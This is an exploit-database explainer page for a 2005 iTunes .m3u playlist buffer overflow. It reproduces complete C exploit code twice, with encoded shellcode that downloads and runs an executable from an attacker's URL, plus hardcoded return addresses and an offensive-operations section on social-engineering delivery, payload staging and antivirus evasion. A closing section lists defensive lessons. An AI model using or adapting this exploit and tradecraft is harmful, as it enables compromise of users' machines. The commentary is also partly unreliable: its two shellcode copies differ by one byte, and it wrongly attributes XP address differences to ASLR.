By exploitdb papers bot•January 16, 2005•
papers
Apple iTunes Playlist Buffer Overflow Exploit Explained
Apple iTunes Playlist Buffer Overflow Exploit Explained
What this paper is
This paper details a buffer overflow vulnerability in Apple iTunes, specifically affecting versions up to 4.7. The vulnerability lies in how iTunes handles specially crafted .m3u playlist files. By creating a malicious .m3u file, an attacker can cause iTunes to crash and, more importantly, execute arbitrary code. The exploit provided in this paper aims to leverage this vulnerability to download and execute a payload from a remote URL.
Simple technical breakdown
The core of the exploit relies on a buffer overflow. When iTunes parses a malicious .m3u file, it attempts to read a URL. If this URL is excessively long, it overwrites a critical memory location, specifically the return address on the stack. The attacker crafts the .m3u file to overwrite this return address with a pointer to their shellcode. This shellcode is designed to download and execute a program from a specified URL.
The exploit works by:
- Creating a malicious
.m3ufile: This file contains a long string that triggers the buffer overflow. - Overwriting the return address: The overflowed data replaces the legitimate return address with a specific address pointing to the attacker's shellcode. This address is chosen to be a "safe" instruction (like
push eax) within a loaded module (kernel32.dll) that will then jump to the shellcode. - Executing shellcode: When the vulnerable function returns, instead of going back to the legitimate code, it jumps to the attacker's shellcode.
- Downloading and executing payload: The shellcode then uses HTTP to download an executable file from a URL provided by the attacker and runs it.
Complete code and payload walkthrough
Let's break down the provided C code and its components.
/*
*
* Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by iDEFENSE Security (http://www.idefense.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to xT and delikon
* Usage:exploit <Target> <OutputPath> <Url>
* Targets:
* 1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]
* 2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]
* Example:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe
*
*/
/*
*
* Up to iTunes version 4.7 are affected
* Tested with iTunes v4.7 on WinXp Sp2 english platform
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90 // Define the NOP (No Operation) instruction byte- Header Comments: These comments provide metadata about the exploit, including its purpose, discovery, author, copyright, contact information, credits, and usage instructions. They also specify the affected iTunes versions and the tested platform.
- Includes: Standard C libraries for input/output (
stdio.h), general utilities (stdlib.h), console I/O (conio.h), and string manipulation (string.h).mem.his included conditionally for Borland C++. NOPDefinition:0x90is the hexadecimal representation of the x86NOPinstruction. This is used to pad the exploit buffer and create a "NOP sled" to increase the chances of hitting the shellcode.
/* (*.m3u) playlist header */
char m3u_playlist_header[] = "http://";m3u_playlist_header: This defines the initial part of the.m3ufile. The exploit expects the playlist to start withhttp://to indicate a URL.
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x39\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";shellcode: This is the core payload. It's a sequence of bytes representing machine code.- The comment indicates it's a "Generic win32 http download shellcode" and that it's XOR-encrypted with
0x1dby "delikon". - Let's analyze the beginning of the shellcode:
\xEB\x10: This is aJMPinstruction that jumps 16 bytes forward. This is likely used to skip over some initial setup or data.\x58:POP EAX. This instruction pops a value from the stack into theEAXregister.\x31\xC9:XOR ECX, ECX. This zeroes out theECXregister.\x66\x81\xE9\x22\xFF: This sequence is part of the XOR decryption routine. It sets up the XOR key and the loop for decryption. The\x22\xFFlikely represents the initial part of the encrypted data or a marker.- The subsequent bytes are the encrypted shellcode. The
Sifrelefunction (explained later) will decrypt this. - The shellcode's purpose is to:
- Initialize necessary WinAPI functions (like
InternetOpen,InternetOpenUrl,InternetReadFile,CreateProcess). - Construct an HTTP request.
- Download the executable from the provided URL.
- Execute the downloaded executable.
- Initialize necessary WinAPI functions (like
- The
\x1Dat the end of theshellcodearray is likely a null terminator or a marker for the XOR decryption.
- The comment indicates it's a "Generic win32 http download shellcode" and that it's XOR-encrypted with
char *target[]= //return addr - EIP
{
"\x2A\x53\xE6\x77", //push eax - kernel32.dll - WinXP Sp1 english
"\xB0\xBC\x80\x7C" //push eax - kernel32.dll - WinXP Sp2 english
};targetArray: This array stores the "return addresses" that will overwrite the original return address on the stack. These are specific memory addresses withinkernel32.dllthat contain aPUSH EAXinstruction followed by aRET(return) instruction. When the vulnerable function returns, it will jump to thisPUSH EAXinstruction.EAXwill likely contain a pointer to the shellcode, and theRETwill then jump to the shellcode itself. The addresses are different for Windows XP SP1 and SP2 due to ASLR (Address Space Layout Randomization) or different module base addresses.
FILE *di;
int targetnum;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;- Global Variables:
di: A file pointer for writing the.m3ufile.targetnum: Stores the user-selected target index.i: A loop counter.weblength: A short integer to store the length of the URL.web: A pointer to the URL string provided by the user.pointer: A pointer used for string searching within the shellcode.newshellcode: A pointer to a dynamically allocated buffer for the final, modified shellcode.
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}SifreleFunction:- Purpose: This function performs XOR encryption/decryption on a given string. It takes a character pointer (
Name1) as input. - Behavior: It iterates through each character of the input string and XORs it with the
xorkey (0x1d). - Output: It returns a pointer to the modified (encrypted or decrypted) string. In this exploit, it's used to decrypt the
shellcodebefore appending the URL and then to encrypt the URL before appending it to the shellcode. The comment "xored with 0x1d by delikon" suggests the original shellcode was encrypted this way. The exploit decrypts it, appends the URL, and then re-encrypts the URL with the same key.
- Purpose: This function performs XOR encryption/decryption on a given string. It takes a character pointer (
void main(int argc, char *argv[])
{
if (argc < 4)
{
// ... (Print usage instructions) ...
return;
}
targetnum = atoi(argv[1]) - 1; // Convert target string to integer and adjust for 0-based index
web = argv[3]; // Get the URL from command line arguments
if( (di=fopen(argv[2],"wb")) == NULL ) // Open the output file in binary write mode
{
printf("Error opening file!\n");
return;
}
// Write the playlist header
for(i=0;i<sizeof(m3u_playlist_header)-1;i++)
fputc(m3u_playlist_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<3045;i++) // Write 3045 NOP instructions
fputc(NOP,di);
/*Overwriting the return address (EIP) with push eax address*/
/*located somewhere in process space*/
fprintf(di,"%s",target[targetnum]); // Write the target return address (e.g., "push eax" address)
for(i=0;i<50;i++) // Write 50 NOP instructions
fputc(NOP,di);
weblength=(short int)0xff22; // Initialize weblength to a large value (likely related to buffer size)
pointer=strstr(shellcode,"\x22\xff"); // Find a specific marker in the shellcode
weblength-=strlen(web)+1; // Adjust weblength based on the URL length
memcpy(pointer,&weblength,2); // Overwrite the marker with the calculated weblength
// Allocate memory for the new shellcode and copy the original shellcode
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web)); // Append the XOR-encrypted URL
strcat(newshellcode,"\x1d"); // Append the XOR key as a terminator/marker
// Write the final shellcode to the file
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
//for(i=0;i<50;i++) // NOPs (commented out)
//fputc(NOP,di);
printf("Vulnarable m3u file %s has been generated!\n",argv[2]);
fclose(di); // Close the output file
}mainFunction:- Argument Handling: Checks if the correct number of command-line arguments (target, output path, URL) is provided. If not, it prints usage instructions.
- Target Selection: Parses the target number from
argv[1]and converts it to an index for thetargetarray. - URL Storage: Stores the URL from
argv[3]in thewebvariable. - File Creation: Opens the output file specified by
argv[2]in binary write mode ("wb"). - Header Writing: Writes the
m3u_playlist_header("http://") to the file. - NOP Sled: Writes 3045
NOPinstructions (0x90) to the file. This creates a large buffer of NOPs. If the overflow causes execution to land anywhere within this NOP sled, it will slide down until it hits the actual shellcode. - Return Address Overwrite: Writes the selected target return address (e.g.,
\x2A\x53\xE6\x77) to the file. This is the crucial step that redirects execution flow. - Padding NOPs: Writes another 50
NOPinstructions after the return address. - Shellcode Modification:
weblength=(short int)0xff22;: Initializesweblengthto a large value. This value,0xff22, is likely a placeholder or a value related to the expected size of the buffer that will be overflowed.pointer=strstr(shellcode,"\x22\xff");: Searches for the byte sequence\x22\xffwithin theshellcode. This sequence is likely a placeholder for theweblengthwithin the original shellcode.weblength-=strlen(web)+1;: Calculates the actual required length for the URL part of the shellcode by subtracting the length of the provided URL (plus one for a null terminator) from the initialweblength. This suggests the shellcode expects a specific total size for the URL portion.memcpy(pointer,&weblength,2);: Copies the calculatedweblength(2 bytes, as it's ashort int) into theshellcodeat the location found bystrstr. This effectively tells the shellcode how long the URL data is.newshellcode = new char[sizeof(shellcode)+strlen(web)+1];: Dynamically allocates memory for the final shellcode. The size is the original shellcode size plus the length of the URL plus one for a null terminator.strcpy(newshellcode,shellcode);: Copies the modified originalshellcodeinto the new buffer.strcat(newshellcode,Sifrele(web));: Appends the provided URL, after being XOR-encrypted by theSifrelefunction, to thenewshellcode.strcat(newshellcode,"\x1d");: Appends the XOR key0x1dat the end. This might serve as a terminator for the shellcode or a marker for the decryption routine.
- Shellcode Writing: Writes the entire
newshellcode(which now contains the original shellcode, the encrypted URL, and the XOR key) to the output file. - Completion Message: Prints a confirmation message indicating that the
.m3ufile has been generated. - File Close: Closes the output file.
Code Fragment/Block -> Practical Purpose Mapping:
#define NOP 0x90-> Defines the byte for the No Operation instruction, used for padding.char m3u_playlist_header[] = "http://";-> The standard start of an M3U playlist that points to a URL.char shellcode[] = ...;-> The raw bytes of the shellcode, which is designed to download and execute a file from a URL. It's XOR-encrypted.char *target[] = { ... };-> An array of specific memory addresses withinkernel32.dllthat will be used to redirect execution flow to the shellcode. These are target-specific.Sifrele(char *Name1)-> A function to XOR-encrypt/decrypt strings, used here for the shellcode and the URL.main(int argc, char *argv[])-> The entry point of the exploit program.if (argc < 4) { ... }-> Checks for correct command-line arguments.targetnum = atoi(argv[1]) - 1;-> Parses the target OS version.web = argv[3];-> Stores the remote URL.di=fopen(argv[2],"wb")-> Opens the output file for writing the malicious.m3u.for(i=0;i<3045;i++) fputc(NOP,di);-> Writes a large "NOP sled" to increase exploit reliability.fprintf(di,"%s",target[targetnum]);-> Writes the chosen return address (e.g.,push eaxinstruction address) to overwrite the legitimate return address.weblength=(short int)0xff22; pointer=strstr(shellcode,"\x22\xff"); weblength-=strlen(web)+1; memcpy(pointer,&weblength,2);-> This complex block modifies the shellcode to correctly encode the length of the URL that will be appended.newshellcode = new char[sizeof(shellcode)+strlen(web)+1]; strcpy(newshellcode,shellcode); strcat(newshellcode,Sifrele(web)); strcat(newshellcode,"\x1d");-> Constructs the final shellcode by copying the original, appending the XOR-encrypted URL, and adding a terminator.for(i=0;i<strlen(newshellcode);i++) fputc(newshellcode[i],di);-> Writes the complete, modified shellcode to the.m3ufile.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the target machine. The exploit relies on the user opening a malicious
.m3ufile with an affected version of iTunes. This could be delivered via email, a shared network drive, or a compromised website. - Lab Preconditions:
- A vulnerable version of Apple iTunes (up to v4.7) installed on a Windows XP SP1 or SP2 English system.
- A web server accessible from the target machine to host the payload executable.
- The exploit program compiled on a compatible Windows environment (e.g., using Borland C++ or a similar compiler that supports the syntax).
- Tooling Assumptions:
- The exploit is written in C and requires a C compiler.
- A web server capable of serving the payload executable (e.g., Apache, Nginx, Python's
http.server). - The payload executable must be prepared and placed on the web server.
- Execution Pitfalls:
- iTunes Version: The exploit is highly version-specific. Newer versions of iTunes or different operating systems will likely not be vulnerable.
- OS/Language Specificity: The target return addresses (
targetarray) are specific to Windows XP English versions. Different OS versions or language packs will have differentkernel32.dllbase addresses, rendering these addresses invalid. - Payload Hosting: The URL provided must be valid and the payload executable must be present and accessible on the web server. If the download fails, the shellcode might crash or do nothing.
- Anti-Virus/EDR: Modern security solutions will likely detect the shellcode's behavior (downloading executables, process injection) or the exploit file itself. The XOR encryption is a basic obfuscation technique and easily bypassed by signature-based detection.
- Buffer Size: The exact size of the overflow and the placement of the return address are critical. Small changes in iTunes or Windows versions could alter these offsets. The large NOP sled helps mitigate some of this, but it's not foolproof.
- Shellcode Reliability: The shellcode itself might have dependencies or fail on certain system configurations. Testing the shellcode independently is crucial.
- Tradecraft Considerations:
- Delivery: The primary challenge is getting the victim to open the
.m3ufile. Social engineering is key. - Payload: The downloaded executable should be a well-crafted payload that doesn't immediately trigger AV. Staged payloads are often preferred.
- Stealth: The exploit itself is noisy. The generated
.m3ufile is a file artifact. The download and execution of the payload will generate network and process creation telemetry. - Reconnaissance: Thorough reconnaissance of the target environment is essential to confirm the presence of vulnerable iTunes versions and operating system details.
- Delivery: The primary challenge is getting the victim to open the
- Likely Failure Points:
- Target system not running a vulnerable iTunes version.
- Target system not running Windows XP English SP1 or SP2.
- The
.m3ufile is not opened by the user. - The URL is incorrect or the payload is not accessible.
- Anti-virus software detects and blocks the exploit or the downloaded payload.
- The shellcode fails to initialize WinAPI functions or execute the downloaded program.
Where this was used and when
- Discovery: The vulnerability was discovered by iDEFENSE Security.
- Exploitation: This specific exploit code was published in January 2005.
- Context: Exploits like this were common in the early to mid-2000s, targeting popular consumer software like media players. The goal was often to gain initial access for further malicious activities, such as deploying backdoors or ransomware. While this specific exploit targets an older version of iTunes, the principles of buffer overflows and shellcode execution remain relevant in understanding foundational exploit techniques.
Defensive lessons for modern teams
- Patch Management: Keeping software, especially widely used applications like media players, updated is paramount. Vulnerabilities are patched, and outdated versions are prime targets.
- Input Validation: Developers must rigorously validate all user-supplied input, especially when dealing with file parsing or network data. Insufficient buffer handling is a common source of vulnerabilities.
- Secure Coding Practices: Employing secure coding guidelines, using memory-safe languages where possible, and performing static/dynamic code analysis can help identify and prevent buffer overflow vulnerabilities.
- Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious file creation (like the
.m3ufile), anomalous process behavior (like a media player downloading and executing files), and network connections to known malicious IPs or unusual domains. - Least Privilege: Running applications with the minimum necessary privileges can limit the impact of a successful exploit. If iTunes were running with limited user rights, the downloaded payload would also have those limited rights.
- Network Segmentation and Monitoring: Monitoring network traffic for unusual downloads or connections from unexpected applications can help detect exploitation attempts.
- Application Whitelisting: Restricting which applications are allowed to run on endpoints can prevent unauthorized executables from being launched, even if an exploit is successful.
ASCII visual (if applicable)
This exploit's flow can be visualized as follows:
+-----------------+ +-------------------+ +---------------------+
| User opens | --> | iTunes parses | --> | Buffer Overflow |
| Malicious .m3u | | .m3u file | | occurs |
+-----------------+ +-------------------+ +---------------------+
|
v
+---------------------+ +-------------------+ +---------------------+
| Shellcode executes | <-- | Return address | <-- | Overwritten |
| (download/execute) | | points to shellcode | | return address |
+---------------------+ +-------------------+ +---------------------+
|
v
+-----------------+
| Remote Web Server |
| (Payload Hosted) |
+-----------------+
|
v
+-----------------+
| Downloaded |
| Executable |
| Runs on target |
+-----------------+Source references
- Paper ID: 759
- Paper Title: Apple iTunes - Playlist Buffer Overflow Download Shellcode
- Author: ATmaCA
- Published: 2005-01-16
- Keywords: Windows, remote
- Paper URL: https://www.exploit-db.com/papers/759
- Raw URL: https://www.exploit-db.com/raw/759
- Vulnerability Discovery: iDEFENSE Security (http://www.idefense.com)
- Shellcode Contribution: delikon (http://delikon.de/)
Original Exploit-DB Content (Verbatim)
/*
*
* Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by iDEFENSE Security (http://www.idefense.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to xT and delikon
* Usage:exploit <Target> <OutputPath> <Url>
* Targets:
* 1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]
* 2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]
* Example:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe
*
*/
/*
*
* Up to iTunes version 4.7 are affected
* Tested with iTunes v4.7 on WinXp Sp2 english platform
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90
/* (*.m3u) playlist header */
char m3u_playlist_header[] = "http://";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
char *target[]= //return addr - EIP
{
"\x2A\x53\xE6\x77", //push eax - kernel32.dll - WinXP Sp1 english
"\xB0\xBC\x80\x7C" //push eax - kernel32.dll - WinXP Sp2 english
};
FILE *di;
int targetnum;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}
void main(int argc, char *argv[])
{
if (argc < 4)
{
printf("Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit\n");
printf("Bug discoveried by iDEFENSE Security (http://www.idefense.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca@icqmail.com\n");
printf("Credit to xT and delikon\n\n");
printf("\tUsage:exploit <Target> <OutputPath> <Url>\n");
printf("\tTargets:\n");
printf("\t1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]\n");
printf("\t2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]\n");
printf("\tExample:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
targetnum = atoi(argv[1]) - 1;
web = argv[3];
if( (di=fopen(argv[2],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;i<sizeof(m3u_playlist_header)-1;i++)
fputc(m3u_playlist_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<3045;i++)
fputc(NOP,di);
/*Overwriting the return address (EIP) with push eax address*/
/*located somewhere in process space*/
fprintf(di,"%s",target[targetnum]); // - ret
for(i=0;i<50;i++) //NOPs
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(shellcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"\x1d");
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
//for(i=0;i<50;i++) //NOPs
//fputc(NOP,di);
printf("Vulnarable m3u file %s has been generated!\n",argv[2]);
fclose(di);
}
// milw0rm.com [2005-01-16]